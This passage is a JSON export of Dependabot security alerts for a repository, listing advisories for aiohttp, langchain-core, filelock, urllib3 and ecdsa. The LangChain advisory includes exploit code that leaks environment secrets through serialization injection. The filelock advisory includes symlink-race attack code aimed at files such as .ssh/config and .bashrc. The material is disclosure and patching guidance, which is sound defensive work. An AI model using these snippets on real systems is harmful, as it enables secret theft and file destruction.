3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00053,"percentile":0.16392},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/71","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/71","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":70,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6mq8-rvhq-8wgg","cve_id":"CVE-2025-69223","summary":"AIOHTTP's HTTP Parser auto_decompress feature is vulnerable to zip bomb","description":"### Summary\nA zip bomb can be used to execute a DoS against the aiohttp server.\n\n### Impact\nAn attacker may be able to send a compressed request that when decompressed by aiohttp could exhaust the host's memory.\n\n------\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a","severity":"high","identifiers":[{"value":"GHSA-6mq8-rvhq-8wgg","type":"GHSA"},{"value":"CVE-2025-69223","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg"},{"url":"https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69223"},{"url":"https://github.com/advisories/GHSA-6mq8-rvhq-8wgg"}],"published_at":"2026-01-05T22:58:41Z","updated_at":"2026-01-06T16:06:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"high","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"high","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/70","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/70","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":69,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-c67j-w6g6-q2cm","cve_id":"CVE-2025-68664","summary":"LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs","description":"## Summary\n\nA serialization injection vulnerability exists in LangChain's `dumps()` and `dumpd()` functions. The functions do not escape dictionaries with `'lc'` keys when serializing free-form dictionaries. The `'lc'` key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.\n\n### Attack surface\n\nThe core vulnerability was in `dumps()` and `dumpd()`: these functions failed to escape user-controlled dictionaries containing `'lc'` keys. When this unescaped data was later deserialized via `load()` or `loads()`, the injected structures were treated as legitimate LangChain objects rather than plain user data.\n\nThis escaping bug enabled several attack vectors:\n\n1. **Injection via user data**: Malicious LangChain object structures could be injected through user-controlled fields like `metadata`, `additional_kwargs`, or `response_metadata`\n2. 
**Class instantiation within trusted namespaces**: Injected manifests could instantiate any `Serializable` subclass, but only within the pre-approved trusted namespaces (`langchain_core`, `langchain`, `langchain_community`). This includes classes with side effects in `__init__` (network calls, file operations, etc.). Note that namespace validation was already enforced before this patch, so arbitrary classes outside these trusted namespaces could not be instantiated.\n\n### Security hardening\n\nThis patch fixes the escaping bug in `dumps()` and `dumpd()` and introduces new restrictive defaults in `load()` and `loads()`: allowlist enforcement via `allowed_objects=\"core\"` (restricted to [serialization mappings](https://github.com/langchain-ai/langchain/blob/master/libs/core/langchain_core/load/mapping.py)), `secrets_from_env` changed from `True` to `False`, and default Jinja2 template blocking via `init_validator`. These are breaking changes for some use cases.\n\n## Who is affected?\n\nApplications are vulnerable if they:\n\n1. **Use `astream_events(version=\"v1\")`** — The v1 implementation internally uses vulnerable serialization. Note: `astream_events(version=\"v2\")` is not vulnerable.\n2. **Use `Runnable.astream_log()`** — This method internally uses vulnerable serialization for streaming outputs.\n3. **Call `dumps()` or `dumpd()` on untrusted data, then deserialize with `load()` or `loads()`** — Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains `'lc'` key structures.\n4. **Deserialize untrusted data with `load()` or `loads()`** — Directly deserializing untrusted data that may contain injected `'lc'` structures.\n5. **Use `RunnableWithMessageHistory`** — Internal serialization in message history handling.\n6. **Use `InMemoryVectorStore.load()`** to deserialize untrusted documents.\n7. 
Load untrusted generations from cache using **`langchain-community` caches**.\n8. Load untrusted manifests from the LangChain Hub via **`hub.pull`**.\n9. Use **`StringRunEvaluatorChain`** on untrusted runs.\n10. Use **`create_lc_store`** or **`create_kv_docstore`** with untrusted documents.\n11. Use **`MultiVectorRetriever`** with byte stores containing untrusted documents.\n12. Use **`LangSmithRunChatLoader`** with runs containing untrusted messages.\n\nThe most common attack vector is through **LLM response fields** like `additional_kwargs` or `response_metadata`, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.\n\n## Impact\n\nAttackers who control serialized data can extract environment variable secrets by injecting `{\"lc\": 1, \"type\": \"secret\", \"id\": [\"ENV_VAR\"]}` to load environment variables during deserialization (when `secrets_from_env=True`, which was the old default). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within trusted namespaces with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.\n\nKey severity factors:\n\n- Affects the serialization path - applications trusting their own serialization output are vulnerable\n- Enables secret extraction when combined with `secrets_from_env=True` (the old default)\n- LLM responses in `additional_kwargs` can be controlled via prompt injection\n\n## Exploit example\n\n```python\nfrom langchain_core.load import dumps, load\nimport os\n\n# Attacker injects secret structure into user-controlled data\nattacker_dict = {\n \"user_data\": {\n \"lc\": 1,\n \"type\": \"secret\",\n \"id\": [\"OPENAI_API_KEY\"]\n }\n}\n\nserialized = dumps(attacker_dict) # Bug: does NOT escape the 'lc' key\n\nos.environ[\"OPENAI_API_KEY\"] = \"sk-secret-key-12345\"\ndeserialized = load(serialized, 
secrets_from_env=True)\n\nprint(deserialized[\"user_data\"]) # \"sk-secret-key-12345\" - SECRET LEAKED!\n\n```\n\n## Security hardening changes (breaking changes)\n\nThis patch introduces three breaking changes to `load()` and `loads()`:\n\n1. **New `allowed_objects` parameter** (defaults to `'core'`): Enforces allowlist of classes that can be deserialized. The `'all'` option corresponds to the list of objects [specified in `mappings.py`](https://github.com/langchain-ai/langchain/blob/master/libs/core/langchain_core/load/mapping.py) while the `'core'` option limits to objects within `langchain_core`. We recommend that users explicitly specify which objects they want to allow for serialization/deserialization.\n2. **`secrets_from_env` default changed from `True` to `False`**: Disables automatic secret loading from environment\n3. **New `init_validator` parameter** (defaults to `default_init_validator`): Blocks Jinja2 templates by default\n\n## Migration guide\n\n### No changes needed for most users\n\nIf you're deserializing standard LangChain types (messages, documents, prompts, trusted partner integrations like `ChatOpenAI`, `ChatAnthropic`, etc.), your code will work without changes:\n\n```python\nfrom langchain_core.load import load\n\n# Uses default allowlist from serialization mappings\nobj = load(serialized_data)\n\n```\n\n### For custom classes\n\nIf you're deserializing custom classes not in the serialization mappings, add them to the allowlist:\n\n```python\nfrom langchain_core.load import load\nfrom my_package import MyCustomClass\n\n# Specify the classes you need\nobj = load(serialized_data, allowed_objects=[MyCustomClass])\n```\n\n### For Jinja2 templates\n\nJinja2 templates are now blocked by default because they can execute arbitrary code. 
If you need Jinja2 templates, pass `init_validator=None`:\n\n```python\nfrom langchain_core.load import load\nfrom langchain_core.prompts import PromptTemplate\n\nobj = load(\n serialized_data,\n allowed_objects=[PromptTemplate],\n init_validator=None\n)\n\n```\n\n> [!WARNING]\n> Only disable `init_validator` if you trust the serialized data. Jinja2 templates can execute arbitrary Python code.\n\n### For secrets from environment\n\n`secrets_from_env` now defaults to `False`. If you need to load secrets from environment variables:\n\n```python\nfrom langchain_core.load import load\n\nobj = load(serialized_data, secrets_from_env=True)\n```\n\n\n## Credits\n\n* Dumps bug was reported by @yardenporat\n* Changes for security hardening due to findings from @0xn3va and @VladimirEliTokarev","severity":"critical","identifiers":[{"value":"GHSA-c67j-w6g6-q2cm","type":"GHSA"},{"value":"CVE-2025-68664","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-c67j-w6g6-q2cm"},{"url":"https://github.com/langchain-ai/langchain/pull/34455"},{"url":"https://github.com/langchain-ai/langchain/pull/34458"},{"url":"https://github.com/langchain-ai/langchain/commit/5ec0fa69de31bbe3d76e4cf9cd65a6accb8466c8"},{"url":"https://github.com/langchain-ai/langchain/commit/d9ec4c5cc78960abd37da79b0250f5642e6f0ce6"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.81"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68664"},{"url":"https://github.com/advisories/GHSA-c67j-w6g6-q2cm"}],"published_at":"2025-12-23T18:46:13Z","updated_at":"2025-12-24T01:08:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":">= 1.0.0, < 
1.2.5","first_patched_version":{"identifier":"1.2.5"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":"< 0.3.81","first_patched_version":{"identifier":"0.3.81"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N","score":9.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.02264,"percentile":0.84694},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N","score":9.3},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":">= 1.0.0, < 1.2.5","first_patched_version":{"identifier":"1.2.5"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/69","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/69","created_at":"2026-05-13T05:27:11Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":68,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"filelock"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-w853-jp5j-5j7f","cve_id":"CVE-2025-68146","summary":"filelock has a TOCTOU race condition which allows symlink attacks during lock file creation","description":"### Impact\n\nA Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. 
An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file.\n\n**Who is impacted:**\n\nAll users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries:\n\n- **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths\n- **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures\n- **poetry/tox users**: through using virtualenv or filelock on their own.\n\nAttack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable.\n\n### Patches\n\nFixed in version **3.20.1**.\n\n**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\\_acquire() to prevent symlink following.\n\n**Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\\_acquire().\n\n**Users should upgrade to filelock 3.20.1 or later immediately.**\n\n### Workarounds\n\nIf immediate upgrade is not possible:\n\n1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases)\n2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks\n3. Monitor lock file directories for suspicious symlinks before running trusted applications\n\n**Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. 
Upgrading to version 3.20.1 is strongly recommended.\n\n______________________________________________________________________\n\n## Technical Details: How the Exploit Works\n\n### The Vulnerable Code Pattern\n\n**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):\n\n```python\ndef _acquire(self) -> None:\n ensure_directory_exists(self.lock_file)\n open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate\n if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist?\n open_flags |= os.O_CREAT\n fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate\n```\n\n**Windows** (`src/filelock/_windows.py:19-28`):\n\n```python\ndef _acquire(self) -> None:\n raise_on_not_writable_file(self.lock_file) # (1) Check writability\n ensure_directory_exists(self.lock_file)\n flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate\n fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate\n```\n\n### The Race Window\n\nThe vulnerability exists in the gap between operations:\n\n**Unix variant:**\n\n```\nTime Victim Thread Attacker Thread\n---- ------------- ---------------\nT0 Check: lock_file exists? → False\nT1 ↓ RACE WINDOW\nT2 Create symlink: lock → victim_file\nT3 Open lock_file with O_TRUNC\n → Follows symlink\n → Opens victim_file\n → Truncates victim_file to 0 bytes! ☠️\n```\n\n**Windows variant:**\n\n```\nTime Victim Thread Attacker Thread\n---- ------------- ---------------\nT0 Check: lock_file writable?\nT1 ↓ RACE WINDOW\nT2 Create symlink: lock → victim_file\nT3 Open lock_file with O_TRUNC\n → Follows symlink/junction\n → Opens victim_file\n → Truncates victim_file to 0 bytes! ☠️\n```\n\n### Step-by-Step Attack Flow\n\n**1. Attacker Setup:**\n\n```python\n# Attacker identifies target application using filelock\nlock_path = \"/tmp/myapp.lock\" # Predictable lock path\nvictim_file = \"/home/victim/.ssh/config\" # High-value target\n```\n\n**2. 
Attacker Creates Race Condition:**\n\n```python\nimport os\nimport threading\n\n\ndef attacker_thread():\n # Remove any existing lock file\n try:\n os.unlink(lock_path)\n except FileNotFoundError:\n pass\n\n # Create symlink pointing to victim file\n os.symlink(victim_file, lock_path)\n print(f\"[Attacker] Created: {lock_path} → {victim_file}\")\n\n\n# Launch attack\nthreading.Thread(target=attacker_thread).start()\n```\n\n**3. Victim Application Runs:**\n\n```python\nfrom filelock import UnixFileLock\n\n# Normal application code\nlock = UnixFileLock(\"/tmp/myapp.lock\")\nlock.acquire() # ← VULNERABILITY TRIGGERED HERE\n# At this point, /home/victim/.ssh/config is now 0 bytes!\n```\n\n**4. What Happens Inside os.open():**\n\nOn Unix systems, when `os.open()` is called:\n\n```c\n// Linux kernel behavior (simplified)\nint open(const char *pathname, int flags) {\n struct file *f = path_lookup(pathname); // Resolves symlinks by default!\n\n if (flags & O_TRUNC) {\n truncate_file(f); // ← Truncates the TARGET of the symlink\n }\n\n return file_descriptor;\n}\n```\n\nWithout `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file.\n\n### Why the Attack Succeeds Reliably\n\n**Timing Characteristics:**\n\n- **Check operation** (Path.exists()): ~100-500 nanoseconds\n- **Symlink creation** (os.symlink()): ~1-10 microseconds\n- **Race window**: ~1-5 microseconds (very small but exploitable)\n- **Thread scheduling quantum**: ~1-10 milliseconds\n\n**Success factors:**\n\n1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts\n2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations\n3. **No synchronization**: No atomic file creation prevents the race\n4. 
**Symlink speed**: Creating symlinks is extremely fast (metadata-only operation)\n\n### Real-World Attack Scenarios\n\n**Scenario 1: virtualenv Exploitation**\n\n```python\n# Victim runs: python -m venv /tmp/myenv\n# Attacker racing to create:\nos.symlink(\"/home/victim/.bashrc\", \"/tmp/myenv/pyvenv.cfg\")\n\n# Result: /home/victim/.bashrc overwritten with:\n# home = /usr/bin/python3\n# include-system-site-packages = false\n# version = 3.11.2\n# ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker\n```\n\n**Scenario 2: PyTorch Cache Poisoning**\n\n```python\n# Victim runs: import torch\n# PyTorch checks CPU capabilities, uses filelock on cache\n# Attacker racing to create:\nos.symlink(\"/home/victim/.torch/compiled_model.pt\", \"/home/victim/.cache/torch/cpu_isa_check.lock\")\n\n# Result: Trained ML model checkpoint truncated to 0 bytes\n# Impact: Weeks of training lost, ML pipeline DoS\n```\n\n### Why Standard Defenses Don't Help\n\n**File permissions don't prevent this:**\n\n- Attacker doesn't need write access to victim_file\n- os.open() with O_TRUNC follows symlinks using the *victim's* permissions\n- The victim process truncates its own file\n\n**Directory permissions help but aren't always feasible:**\n\n- Lock files often created in shared /tmp directory (mode 1777)\n- Applications may not control lock file location\n- Many apps use predictable paths in user-writable directories\n\n**File locking doesn't prevent this:**\n\n- The truncation happens *during* the open() call, before any lock is acquired\n- fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks\n\n### Exploitation Proof-of-Concept Results\n\nFrom empirical testing with the provided PoCs:\n\n**Simple Direct Attack** (`filelock_simple_poc.py`):\n\n- Success rate: 33% per attempt (1 in 3 tries)\n- Average attempts to success: 2.1\n- Target file reduced to 0 bytes in \\<100ms\n\n**virtualenv Attack** (`weaponized_virtualenv.py`):\n\n- Success rate: ~90% on 
first attempt (deterministic timing)\n- Information leaked: File paths, Python version, system configuration\n- Data corruption: Complete loss of original file contents\n\n**PyTorch Attack** (`weaponized_pytorch.py`):\n\n- Success rate: 25-40% per attempt\n- Impact: Application crashes, model loading failures\n- Recovery: Requires cache rebuild or model retraining\n\n**Discovered and reported by:** George Tsigourakos (@tsigouris007)","severity":"medium","identifiers":[{"value":"GHSA-w853-jp5j-5j7f","type":"GHSA"},{"value":"CVE-2025-68146","type":"CVE"}],"references":[{"url":"https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f"},{"url":"https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e"},{"url":"https://github.com/tox-dev/filelock/releases/tag/3.20.1"},{"url":"https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants"},{"url":"https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html"},{"url":"https://github.com/advisories/GHSA-w853-jp5j-5j7f"}],"published_at":"2025-12-16T20:52:55Z","updated_at":"2025-12-16T20:52:56Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.1","first_patched_version":{"identifier":"3.20.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H","score":6.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":4.0e-05,"percentile":0.00136},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H","score":6.3},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"},{"cwe_id":"CWE-367","name":"Time-of-check Time-of-use (TOCTOU) Race 
Condition"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.1","first_patched_version":{"identifier":"3.20.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/68","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/68","created_at":"2026-05-13T05:27:11Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":67,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-2xpw-w6gg-jr37","cve_id":"CVE-2025-66471","summary":"urllib3 streaming API improperly handles highly compressed data","description":"### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nWhen streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation.\n\nThe decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. 
This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data.\n\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources.\n\n`stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`, `readinto(b)` are examples of `urllib3.HTTPResponse` method calls using the affected logic unless decoding is disabled explicitly.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount.\n\nIf your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the `urllib3[brotli]` extra in the patched versions of urllib3.\n\n\n### Credits\n\nThe issue was reported by @Cycloctane.\nSupplemental information was provided by @stamparm during a security audit performed by [7ASecurity](https://7asecurity.com/) and facilitated by [OSTIF](https://ostif.org/).","severity":"high","identifiers":[{"value":"GHSA-2xpw-w6gg-jr37","type":"GHSA"},{"value":"CVE-2025-66471","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37"},{"url":"https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66471"},{"url":"https://github.com/advisories/GHSA-2xpw-w6gg-jr37"}],"published_at":"2025-12-05T18:15:54Z","updated_at":"2025-12-05T18:33:09Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.0, < 
2.6.0","first_patched_version":{"identifier":"2.6.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00014,"percentile":0.02784},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.0, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/67","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/67","created_at":"2026-05-13T05:27:11Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":66,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-gm62-xv2j-4w53","cve_id":"CVE-2025-66418","summary":"urllib3 allows an unbounded number of links in the decompression chain","description":"## Impact\n\nurllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`).\n\nHowever, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data.\n\n\n## Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly.\n\n\n## Remediation\n\nUpgrade to at least 
urllib3 v2.6.0 in which the library limits the number of links to 5.\n\nIf upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers[\"content-encoding\"]` contains a safe number of encodings before reading the response content.","severity":"high","identifiers":[{"value":"GHSA-gm62-xv2j-4w53","type":"GHSA"},{"value":"CVE-2025-66418","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53"},{"url":"https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66418"},{"url":"https://github.com/advisories/GHSA-gm62-xv2j-4w53"}],"published_at":"2025-12-05T18:15:19Z","updated_at":"2025-12-05T18:33:00Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.24, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00016,"percentile":0.03574},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.24, < 
2.6.0","first_patched_version":{"identifier":"2.6.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/66","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/66","created_at":"2026-05-13T05:27:11Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":65,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"ecdsa"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-wj6h-64fc-37mp","cve_id":"CVE-2024-23342","summary":"Minerva timing attack on P-256 in python-ecdsa","description":"python-ecdsa has been found to be subject to a Minerva timing attack on the P-256 curve. Using the `ecdsa.SigningKey.sign_digest()` API function and timing signatures an attacker can leak the internal nonce which may allow for private key discovery. Both ECDSA signatures, key generation, and ECDH operations are affected. ECDSA signature verification is unaffected. 
The python-ecdsa project considers side channel attacks out of scope for the project and there is no planned fix.","severity":"high","identifiers":[{"value":"GHSA-wj6h-64fc-37mp","type":"GHSA"},{"value":"CVE-2024-23342","type":"CVE"}],"references":[{"url":"https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-wj6h-64fc-37mp"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/blob/master/SECURITY.md"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23342"},{"url":"https://minerva.crocs.fi.muni.cz"},{"url":"https://securitypitfalls.wordpress.com/2018/08/03/constant-time-compare-in-python"},{"url":"https://github.com/advisories/GHSA-wj6h-64fc-37mp"}],"published_at":"2024-01-22T21:35:27Z","updated_at":"2025-07-30T18:17:41Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"high","vulnerable_version_range":">= 